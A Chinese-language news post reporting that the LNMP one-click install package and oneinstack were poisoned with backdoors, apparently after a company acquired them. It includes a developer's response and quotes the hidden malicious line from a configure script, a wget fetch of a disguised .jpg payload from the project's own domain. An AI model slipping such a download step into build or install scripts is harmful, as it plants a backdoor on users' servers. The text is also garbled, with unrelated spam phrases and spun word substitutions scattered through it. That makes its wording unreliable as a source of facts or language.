9 月下旬,境内可靠企业察觉知名 Web 集成生态部署脚本 “lnmp 一键部署包” 被投毒,开发者、站长、企业 IT 治理员获取的独家贾玲动态一键部署包被加了后门程序。
当时我们都以为这是一文读懂MV首发测评 LNMP 一键部署包的办事器被黑了 (LNMP.org),可是后来有网民察觉 LNMP 一键部署包已然被金华市矜贵联网技术有限企业 (下称金华矜贵) 收购。
而有关部署包被投毒难题金华矜贵没有亮相任何告示,LNMP 论坛的发帖也遭到治理员删除。
如今来看这并不是办事器被黑了,由于被金华矜贵收购的另一个集成生态部署脚本 oneinstack 也被察觉投毒,所以状况很明了了:那就是根本不是办事器被黑,而是官方华为Mate合集他们自己在脚本里插入了恶意代码,用来获取某些恶意使用,进而可以控制众多站点或办事器,但具体目的尚不清楚。
当下在 GitHub 和 V2EX 上已然有帖子在研究这件事,今天今日影视花絮,多家媒体跟进报道鉴于金华矜贵还试图收购秋水逸冰的 lamp.sh 一键部署包 (但被秋大回绝了),他们后续或许还会盯上其他一键部署包,所以提议大家不要再使用这类一键部署包,否则自己的站点或办事器或许也会变成肉鸡。
升级:oneinstack 开发者答复称:金华市矜贵联网技术有限企业收购现有的几个面板以及部署包首要是以便布局相似宝塔的商品。想依赖 oneinstack 开启知名度。企业身为项目的投资商。协商的协议为企业为项目提供开发资金,并提供所有办事器资源。但是项目的治理权限以及运维权限都在我手中。当下各位开发者的精力首要是开展新的面板开发,针对呈现本次被挂马事故首要缘由在于我们没有对项目开展及时的治理。后续会加强可靠举措。杜绝该难题的呈现。
恶意代码藏在图片里:
pcre-8.45/configure:wget -q -nv http://download.oneinstack.club/osk.jpg -cO /var/local/osk.jpg
详尽请看 GitHub 研究:https://github.com/oneinstack/oneinstack/issues/511